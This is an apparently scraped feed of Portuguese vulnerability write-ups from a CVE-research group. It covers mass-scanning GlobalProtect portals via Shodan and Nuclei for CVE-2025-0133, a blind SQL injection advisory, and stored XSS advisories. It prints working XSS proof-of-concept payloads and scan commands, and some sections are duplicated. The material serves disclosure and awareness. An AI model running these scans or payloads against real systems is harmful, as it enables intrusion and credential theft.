srcset="/articles/xss-nao-esta-morto/image-1_hu_e49695ca67986346.png 480w, /articles/xss-nao-esta-morto/image-1_hu_9a3164d2b1826f8.png 1024w" loading="lazy" alt="Busca por páginas com Global Protect no Shodan " class="gallery-image" data-flex-grow="437" data-flex-basis="1049px" /></p> <p style="text-align: justify;">No entanto isso não significa que todos estão vulneráveis. Vamos ao experimento para este artigo.</p> <p style="text-align: justify;">Primeiro, extraímos alguns resultados do Shodan, uma pequena amostragem do montante total:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">shodan search --fields hostnames <span class="s1">'http.title:"GlobalProtect Portal" port:443'</span> <span class="p">|</span> grep -v <span class="s1">'^$'</span> > globalprotect-hostnames.txt </span></span></code></pre></td></tr></table> </div> </div><p><img src="/articles/xss-nao-esta-morto/image-2.png" width="1715" height="877" srcset="/articles/xss-nao-esta-morto/image-2_hu_f5d23ac8a0a8c2d7.png 480w, /articles/xss-nao-esta-morto/image-2_hu_80e917587581191.png 1024w" loading="lazy" alt="Shodan CLI usado para exportar páginas com Global Protect" class="gallery-image" data-flex-grow="195" data-flex-basis="469px" /></p> <p style="text-align: justify;">Depois disso, podemos usar o <b><code>Nuclei</code></b> para testar essa vulnerabilidade e automatizar o teste:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">nuclei -l globalprotect-hostnames.txt -t CVE-2025-0133.yaml </span></span></code></pre></td></tr></table> </div> </div><p><img src="/articles/xss-nao-esta-morto/image-3.png" width="1629" height="867" srcset="/articles/xss-nao-esta-morto/image-3_hu_a4ac1f5eae1ec9f0.png 480w, /articles/xss-nao-esta-morto/image-3_hu_a7cb5b9475b5bb68.png 1024w" loading="lazy" alt="Resultado Nuclei template CVE-2025-0133" class="gallery-image" data-flex-grow="187" data-flex-basis="450px" /></p> <p style="text-align: justify;">Template do nuclei utilizado para realizar o scan: <b><a href="https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2025/CVE-2025-0133.yaml" target="_blank">CVE-2025-0133</a></b>.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">id: CVE-2025-0133 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">info: </span></span><span class="line"><span class="cl"> name: PAN-OS - Reflected Cross-Site Scripting </span></span><span class="line"><span class="cl"> author: xbow,DhiyaneshDK </span></span><span class="line"><span class="cl"> severity: medium </span></span><span class="line"><span class="cl"> description: <span class="p">|</span> </span></span><span class="line"><span class="cl"> A reflected cross-site scripting <span class="o">(</span>XSS<span class="o">)</span> vulnerability in the GlobalProtect™ gateway and portal features of Palo Alto Networks PAN-OS® software enables execution of malicious JavaScript in the context of an authenticated Captive Portal user<span class="s1">'s browser when they click on a specially crafted link.The primary risk is phishing attacks that can lead to credential theft—particularly if you enabled Clientless VPN. </span></span></span><span class="line"><span class="cl"><span class="s1"> reference: </span></span></span><span class="line"><span class="cl"><span class="s1"> - https://security.paloaltonetworks.com/CVE-2025-0133 </span></span></span><span class="line"><span class="cl"><span class="s1"> - https://hackerone.com/reports/3096384 </span></span></span><span class="line"><span class="cl"><span class="s1"> classification: </span></span></span><span class="line"><span class="cl"><span class="s1"> epss-score: 0.00102 </span></span></span><span class="line"><span class="cl"><span class="s1"> epss-percentile: 0.29276 </span></span></span><span class="line"><span class="cl"><span class="s1"> metadata: </span></span></span><span class="line"><span class="cl"><span class="s1"> verified: true </span></span></span><span class="line"><span class="cl"><span class="s1"> max-request: 1 </span></span></span><span class="line"><span class="cl"><span class="s1"> shodan-query: </span></span></span><span class="line"><span class="cl"><span class="s1"> - http.favicon.hash:"-631559155" </span></span></span><span class="line"><span class="cl"><span class="s1"> - cpe:"cpe:2.3:o:paloaltonetworks:pan-os" </span></span></span><span class="line"><span class="cl"><span class="s1"> fofa-query: icon_hash="-631559155" </span></span></span><span class="line"><span class="cl"><span class="s1"> product: pan-os </span></span></span><span class="line"><span class="cl"><span class="s1"> vendor: paloaltonetworks </span></span></span><span class="line"><span class="cl"><span class="s1"> tags: hackerone,cve,cve2025,xss,panos,global-protect </span></span></span><span class="line"><span class="cl"><span class="s1"> </span></span></span><span class="line"><span class="cl"><span class="s1">http: </span></span></span><span class="line"><span class="cl"><span class="s1"> - raw: </span></span></span><span class="line"><span class="cl"><span class="s1"> - | </span></span></span><span class="line"><span class="cl"><span class="s1"> GET /ssl-vpn/getconfig.esp?client-type=1&protocol-version=p1&app-version=3.0.1-10&clientos=Linux&os-version=linux-64&hmac-algo=sha1%2Cmd5&enc-algo=aes-128-cbc%2Caes-256-cbc&authcookie=12cea70227d3aafbf25082fac1b6f51d&portal=us-vpn-gw-N&user=%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%3Cscript%3Eprompt%28%22XSS%22%29%3C%2Fscript%3E%3C%2Fsvg%3E&domain=%28empty_domain%29&computer=computer HTTP/1.1 </span></span></span><span class="line"><span class="cl"><span class="s1"> Host: {{Hostname}} </span></span></span><span class="line"><span class="cl"><span class="s1"> </span></span></span><span class="line"><span class="cl"><span class="s1"> matchers-condition: and </span></span></span><span class="line"><span class="cl"><span class="s1"> matchers: </span></span></span><span class="line"><span class="cl"><span class="s1"> - type: word </span></span></span><span class="line"><span class="cl"><span class="s1"> part: body </span></span></span><span class="line"><span class="cl"><span class="s1"> words: </span></span></span><span class="line"><span class="cl"><span class="s1"> - '</span><script>prompt<span class="o">(</span><span class="s2">"XSS"</span><span class="o">)</span></script><span class="s1">' </span></span></span><span class="line"><span class="cl"><span class="s1"> - '</span>authentication cookie<span class="err">'</span> </span></span><span class="line"><span class="cl"> condition: and </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> - type: status </span></span><span class="line"><span class="cl"> status: </span></span><span class="line"><span class="cl"> - <span class="m">200</span> </span></span><span class="line"><span class="cl"><span class="c1"># digest: 490a0046304402202037be3477c0e16d7bb7cfb9874bf1cb6894a1d8035d64115db72607a539a54502203a1dac9b97514abef71fdb6a73d681f64f788f43605f2235f1fbfd26f6ddac2c:922c64590222798bb761d5b6d8e72950</span> </span></span></code></pre></td></tr></table> </div> </div><p style="text-align: justify;">Obtivemos um número significativo de hosts vulneráveis. Em seguida, tentamos identificar, entre esses resultados, quaisquer hosts que tivessem um VDP público, para que pudéssemos notificá-los sobre a vulnerabilidade. Essa etapa é um pouco complexa de ser realizada manualmente, por isso utilizamos inteligência artificial para cruzar os domínios extraídos do <b><code>Shodan</code></b> com informações disponíveis na internet sobre empresas que possuem programas de recompensa por bugs ou VDPs abertos.</p> <p style="text-align: justify;">Durante esta pesquisa, encontramos apenas dois domínios com VDPs públicos — um de uma grande empresa do setor privado e o outro de uma agência governamental. Ambos estão localizados nos Estados Unidos: um com um VDP hospedado no BugCrowd e o outro com um VDP privado, acessível por e-mail.</p> <p style="text-align: justify;">Relatamos ambas as vulnerabilidades às empresas de forma responsável.</p> <p><img src="/articles/xss-nao-esta-morto/image-4.png" width="1477" height="318" srcset="/articles/xss-nao-esta-morto/image-4_hu_4ef3b501dfbf457c.png 480w, /articles/xss-nao-esta-morto/image-4_hu_b14be945089ea159.png 1024w" loading="lazy" alt="POC XSS Refletido em um dos alvos encontrados " class="gallery-image" data-flex-grow="464" data-flex-basis="1114px" /></p> <p><img src="/articles/xss-nao-esta-morto/image-5.png" width="1324" height="691" srcset="/articles/xss-nao-esta-morto/image-5_hu_6322dbd059060c9c.png 480w, /articles/xss-nao-esta-morto/image-5_hu_9279a9a4ff7f61a6.png 1024w" loading="lazy" alt="Divulgação Responsável via Bug Crowd" class="gallery-image" data-flex-grow="191" data-flex-basis="459px" /></p> <p style="text-align: justify;">É importante destacar que a amostra testada representa apenas uma fração dos sistemas expostos.</p> <h2 id="mais-números">Mais números </h2><p style="text-align: justify;">Se você ainda não está convencido pela quantidade de XSS que temos por aí, podemos fazer outra pesquisa simples no <i>GitHub Advisory Database</i>, onde obtemos um retorno de mais de <b>31.611 ocorrências relacionadas a XSS</b>.</p> <p>Se ainda não está convencido da quantidade de XSS que temos por ai, podemos fazer mais uma pesquisa simples no <em>GitHub Advisory Database</em> onde temos um retorno de mais de <strong>31.611 ocorrências relacionadas a XSS</strong>.</p> <p><img src="/articles/xss-nao-esta-morto/image-6.png" width="2692" height="1404" srcset="/articles/xss-nao-esta-morto/image-6_hu_8944e16afc8c1393.png 480w, /articles/xss-nao-esta-morto/image-6_hu_aa853c3ed0f5991.png 1024w" loading="lazy" alt="Pesquisa de XSS no GitHub Advisory Database" class="gallery-image" data-flex-grow="191" data-flex-basis="460px" /></p> <p style="text-align: justify;">Uma busca no banco de dados de <b>CVE (Common Vulnerabilities and Exposures)</b> também revela um número significativo de vulnerabilidades registradas relacionadas ao XSS, demonstrando sua recorrência em diferentes sistemas, aplicações e contextos ao longo dos anos.</p> <p><img src="/articles/xss-nao-esta-morto/image-7.png" width="1096" height="866" srcset="/articles/xss-nao-esta-morto/image-7_hu_dacb254ef186816c.png 480w, /articles/xss-nao-esta-morto/image-7_hu_272a9901a5e54f76.png 1024w" loading="lazy" alt="Pesquisa de XSS no MITRE" class="gallery-image" data-flex-grow="126" data-flex-basis="303px" /></p> <p style="text-align: justify;">Além disso, uma busca realizada na plataforma <b>HackerOne</b>, amplamente reconhecida no ecossistema de <i>Bug Bounty</i>, resulta em um total de <b>2.225 relatórios públicos</b> envolvendo vulnerabilidades de Cross-Site Scripting. Esses dados reforçam não apenas a prevalência do XSS, mas também o interesse contínuo da comunidade de segurança em explorá-lo e relatá-lo, mesmo em ambientes com altos padrões de segurança.</p> <p><img src="/articles/xss-nao-esta-morto/image-8.png" width="1178" height="831" srcset="/articles/xss-nao-esta-morto/image-8_hu_2eaf7efd23d706c8.png 480w, /articles/xss-nao-esta-morto/image-8_hu_c63b99d525b540c3.png 1024w" loading="lazy" alt="Pesquisa por XSS no Hacker One" class="gallery-image" data-flex-grow="141" data-flex-basis="340px" /></p> <h2 id="o-que-dá-para-fazer-com-um-xss-além-do-alert1">O que dá para fazer com um XSS além do alert(1)? </h2><p style="text-align: justify;">O famoso alert(1) costuma ser o primeiro exemplo usado para demonstrar uma falha de XSS. No entanto, os impactos reais dessa vulnerabilidade vão muito além de uma simples janela de alerta. Abaixo, listamos algumas ações maliciosas clássicas e conhecidas que podem ser realizadas por um invasor ao explorar uma falha de Cross-Site Scripting:</p> <p style="text-align: justify;"> <ul> <li><b>Roubo de Cookie</b>, (se o cookie não estiver protegido com o sinalizador HttpOnly);</li> <li><b>Sequestro de Sessão</b>, assumindo a identidade da vítima em aplicativos autenticados;</li> <li><b>Keylogging</b>, capturando tudo o que o usuário digita na página comprometida;</li> <li><b>Redirecionamentos Maliciosos</b> para páginas falsas, com o objetivo de aplicar golpes;</li> <li><b>Execução de ações em nome do usuário</b>, como enviar mensagens, alterar configurações ou excluir dados;</li> <li><b>Execução Remota de Código</b>, embora rara e dependendo do contexto específico, pode ser possível obter acesso remoto a o sistema a partir de um XSS.</li> </ul> </p> <p style="text-align: justify;">Esses exemplos mostram que, embora o XSS seja uma vulnerabilidade frequentemente subestimada, ele pode ter consequências graves, especialmente quando explorado em aplicativos com dados confidenciais ou com alto nível de privilégio para o usuário afetado.</p> <h2 id="conclusão">Conclusão </h2><p style="text-align: justify;">O XSS não morreu; talvez tenha sido apenas ignorado diante de novas ameaças mais "glamourosas". Mas sua presença silenciosa continua a oferecer uma superfície de ataque explorável, muitas vezes com impacto crítico.</p> <p style="text-align: justify;">Apesar de frequentemente ser classificado como uma vulnerabilidade de gravidade <i>média</i> ou mesmo <i>baixa</i>, <b>o XSS não deve ser subestimado</b>. <b>Seu impacto pode ser significativo, especialmente quando envolve roubo de cookies, sequestro de sessão ou redirecionamento para páginas maliciosas. E o que é mais perigoso: as proteções tradicionais nem sempre são suficientes para impedir que o usuário seja induzido a clicar naquele site de phishing que está usando uma URL legítima com uma vulnerabilidade XSS</b>.</p> <p style="text-align: justify;">Afinal, o XSS geralmente depende de um único clique e, nesse cenário, <b>o elo mais fraco geralmente é o próprio usuário</b>. Não importa quão robusta seja sua estrutura ou quão bem configurada esteja sua WAF: se o invasor conseguir criar um link malicioso convincente, basta uma ação desatenta da vítima para que o ataque se concretize.</p> <p style="text-align: justify;"><b>Enquanto nós confiamos em estruturas e WAFs, o invasor confia em nossa falta de cuidado e na curiosidade do usuário.</b></p> <p>Apesar de muitas vezes ser classificado como uma vulnerabilidade de severidade <em>média</em> ou até <em>baixa</em>, o <strong>XSS não deve ser subestimado</strong>. Seu impacto pode ser significativo, especialmente quando envolve o roubo de cookies, sequestro de sessão ou redirecionamento para páginas maliciosas. E o mais perigoso: <strong>nem sempre as proteções tradicionais são suficientes para impedir que o usuário seja enganado e clique naquele phishing que está utilizando uma URL legítima com vulnerabilidade de XSS.</strong></p> <p>Afinal, o XSS frequentemente depende de um simples clique, e nesse cenário, <strong>o elo mais fraco costuma ser o próprio usuário</strong>. Não importa o quão robusto seja seu framework ou quão bem configurado esteja seu WAF: se o atacante conseguir criar um link malicioso convincente, basta uma ação desatenta da vítima para que o ataque se concretize.</p> <p><strong>Enquanto confiamos em frameworks e WAFs, o atacante confia no nosso descuido,e na curiosidade do usuário.</strong></p> <p><img src="/articles/xss-nao-esta-morto/xss-nao-esta-morto.png" width="1200" height="600" srcset="/articles/xss-nao-esta-morto/xss-nao-esta-morto_hu_5292005210033088.png 480w, /articles/xss-nao-esta-morto/xss-nao-esta-morto_hu_6838249933812897.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="200" data-flex-basis="480px" /></p> <h2 id="escrito-por">Escrito por </h2><p><a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/natan50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" >Natan Maia Morette</a></p> <h2 id="colaboradora">Colaboradora </h2><p><a class="link" href="https://www.linkedin.com/in/karina-gante/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/karina50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/karina-gante/" target="_blank" rel="noopener" >Karina Gante</a></p> <h2 id="parceria">Parceria </h2><p><a class="link" href="https://hacktiba.github.io/" target="_blank" rel="noopener" ><img src="/assets/partners/hacktiba60x60.png" loading="lazy" /></a> Esse post foi feito em parceria com <strong><a class="link" href="https://hacktiba.github.io/" target="_blank" rel="noopener" >Hacktiba</a></strong> para o Pulse 07.</p> <blockquote> <p><em>Por: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Mon, 07 Jul 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-53091/ https://www.cvehunters.com/pt/p/cve-2025-53091/ <h2 id="cve-2025-53091-vulnerabilidade-de-injeção-sql-baseada-em-tempo-não-autenticada-no-parâmetro-almox">CVE-2025-53091: Vulnerabilidade de Injeção SQL baseada em tempo não autenticada no parâmetro <code>almox</code> </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-53091" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-53091</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de injeção cega de SQL baseada em tempo foi descoberta no parâmetro <code>almox</code> do endpoint <code>/controle/getProdutosPorAlmox.php</code>. Esse problema permite que qualquer invasor não autenticado injete consultas SQL arbitrárias, potencialmente levando a acesso não autorizado aos dados ou exploração adicional, dependendo da configuração do banco de dados.</p> <h2 id="detalhes">Detalhes </h2><p style="text-align: justify;">O aplicativo não consegue sanitizar adequadamente a entrada fornecida pelo usuário no parâmetro almox. Como resultado, payloads SQL especialmente criados são interpretados diretamente pelo banco de dados de back-end. Essa vulnerabilidade específica é cega por natureza e foi confirmada por meio de inferência baseada em tempo (função SLEEP()).</p><h2 id="cve-2025-53091-vulnerabilidade-de-injeção-sql-baseada-em-tempo-não-autenticada-no-parâmetro-almox">CVE-2025-53091: Vulnerabilidade de Injeção SQL baseada em tempo não autenticada no parâmetro <code>almox</code> </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-53091" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-53091</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de injeção cega de SQL baseada em tempo foi descoberta no parâmetro <code>almox</code> do endpoint <code>/controle/getProdutosPorAlmox.php</code>. Esse problema permite que qualquer invasor não autenticado injete consultas SQL arbitrárias, potencialmente levando a acesso não autorizado aos dados ou exploração adicional, dependendo da configuração do banco de dados.</p> <h2 id="detalhes">Detalhes </h2><p style="text-align: justify;">O aplicativo não consegue sanitizar adequadamente a entrada fornecida pelo usuário no parâmetro almox. Como resultado, payloads SQL especialmente criados são interpretados diretamente pelo banco de dados de back-end. Essa vulnerabilidade específica é cega por natureza e foi confirmada por meio de inferência baseada em tempo (função SLEEP()).</p> <p style="text-align: justify;">A solicitação vulnerável não requer nenhuma forma de autenticação (nenhum cookie, token ou cabeçalho é necessário), o que a torna especialmente crítica.</p> <h2 id="poc">PoC </h2><p style="text-align: justify;">Abaixo estão duas solicitações HTTP de prova de conceito funcionais que demonstram a vulnerabilidade. A diferença no tempo de resposta confirma claramente a execução da função SLEEP() no backend:</p> <p><img src="/p/cve-2025-53091/image.png" width="1764" height="856" srcset="/p/cve-2025-53091/image_hu_a59a17384516386a.png 480w, /p/cve-2025-53091/image_hu_9f758b97b421d6c3.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="206" data-flex-basis="494px" /></p> <p><img src="/p/cve-2025-53091/image-1.png" width="1773" height="847" srcset="/p/cve-2025-53091/image-1_hu_862f1352375e1c2.png 480w, /p/cve-2025-53091/image-1_hu_47187b954f8b5b0c.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="209" data-flex-basis="502px" /></p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Acesso não autorizado a dados confidenciais (por exemplo, usuários, senhas, registros).</li> <li>Enumeração de banco de dados (esquemas, tabelas, usuários, versões).</li> <li>Escalonamento para RCE dependendo da configuração do banco de dados (por exemplo, xp_cmdshell, UDFs).</li> <li>Comprometimento total do aplicativo se encadeado com outras vulnerabilidades.</li> <li>Esse problema afeta todos os usuários e ambientes, pois não requer autenticação e pode ser acessado por meio de um ponto de extremidade público.</li> </ul> </p> <h2 id="referência">Referência </h2><p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-pmf9-2rc3-vvxx#advisory-comment-130861" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-pmf9-2rc3-vvxx#advisory-comment-130861</a></p> <h2 id="encontrado-por">Encontrado por </h2><p><a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/natan50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" >Natan Maia Morette</a></p> <h2 id="colaborador">Colaborador </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Fri, 27 Jun 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-6345/ https://www.cvehunters.com/pt/p/cve-2025-6345/ <h2 id="cve-2025-6345-cross-site-scripting-xss-armazenado-no-endpoint-add-recipephp-parâmetro-recipe-name">CVE-2025-6345: Cross-Site Scripting (XSS) Armazenado no endpoint <code>add-recipe.php</code> parâmetro <code>Recipe Name</code> </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-6345" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-6345</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint <code>add-recipe.php</code> do aplicativo My Food Recipe por Source Codester. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro <code>Recipe Name</code> da aplicação. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p><h2 id="cve-2025-6345-cross-site-scripting-xss-armazenado-no-endpoint-add-recipephp-parâmetro-recipe-name">CVE-2025-6345: Cross-Site Scripting (XSS) Armazenado no endpoint <code>add-recipe.php</code> parâmetro <code>Recipe Name</code> </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-6345" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-6345</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint <code>add-recipe.php</code> do aplicativo My Food Recipe por Source Codester. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro <code>Recipe Name</code> da aplicação. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>/endpoint/add-recipe.php</code></p> <p>Parâmetro: <code>Recipe Name</code></p> <p style="text-align: justify;">O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro <code>Recipe Name</code>. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"> <span class="o"><</span><span class="nx">script</span><span class="o">></span><span class="nx">alert</span><span class="p">(</span><span class="s1">'PoC VulDB My Food Recipe'</span><span class="p">)</span><span class="o"><</span><span class="err">/script></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-6345/image.png" width="1885" height="979" srcset="/p/cve-2025-6345/image_hu_2d96538d4258e3ef.png 480w, /p/cve-2025-6345/image_hu_69d65a36c5d34271.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="192" data-flex-basis="462px" /></p> <p><img src="/p/cve-2025-6345/image-1.png" width="1887" height="978" srcset="/p/cve-2025-6345/image-1_hu_367086433527965a.png 480w, /p/cve-2025-6345/image-1_hu_97a43c355f94af1c.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="192" data-flex-basis="463px" /></p> <h3 id="vídeo-poc">Vídeo PoC: </h3><p><a class="link" href="https://youtu.be/HLt4Ezuzxaw" target="_blank" rel="noopener" >https://youtu.be/HLt4Ezuzxaw</a></p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.</li> <li>Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.</li> <li>Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.</li> <li>Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.</li> <li>Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.</li> <li>Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.</li> <li>Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.</li> <li>Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.</li> </ul> </p> <h2 id="referência">Referência </h2><p><a class="link" href="https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-6345.md" target="_blank" rel="noopener" >https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-6345.md</a></p> <h2 id="encontrado-por">Encontrado por: </h2><p><a class="link" href="https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/raul50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/" target="_blank" rel="noopener" >Raul Pazemécxas</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Thu, 26 Jun 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-6694/ https://www.cvehunters.com/pt/p/cve-2025-6694/ <h2 id="cve-2025-6694-cross-site-scripting-xss-armazenado-no-endpoint-adicionar_unidadephp-parâmetro-unidade">CVE-2025-6694: Cross-Site Scripting (XSS) Armazenado no endpoint <code>adicionar_unidade.php</code> parâmetro <code>Unidade</code> </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-6694" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-6694</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint <code>adicionar_unidade.php</code> do aplicativo WeGIA. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro <code>Unidade</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p> <p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security</a></p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>/html/matPat/adicionar_unidade.php</code></p><h2 id="cve-2025-6694-cross-site-scripting-xss-armazenado-no-endpoint-adicionar_unidadephp-parâmetro-unidade">CVE-2025-6694: Cross-Site Scripting (XSS) Armazenado no endpoint <code>adicionar_unidade.php</code> parâmetro <code>Unidade</code> </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-6694" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-6694</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint <code>adicionar_unidade.php</code> do aplicativo WeGIA. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro <code>Unidade</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p> <p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security</a></p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>/html/matPat/adicionar_unidade.php</code></p> <p>Parâmetro: <code>Unidade</code></p> <p style="text-align: justify;">O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro <code>Unidade</code>. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 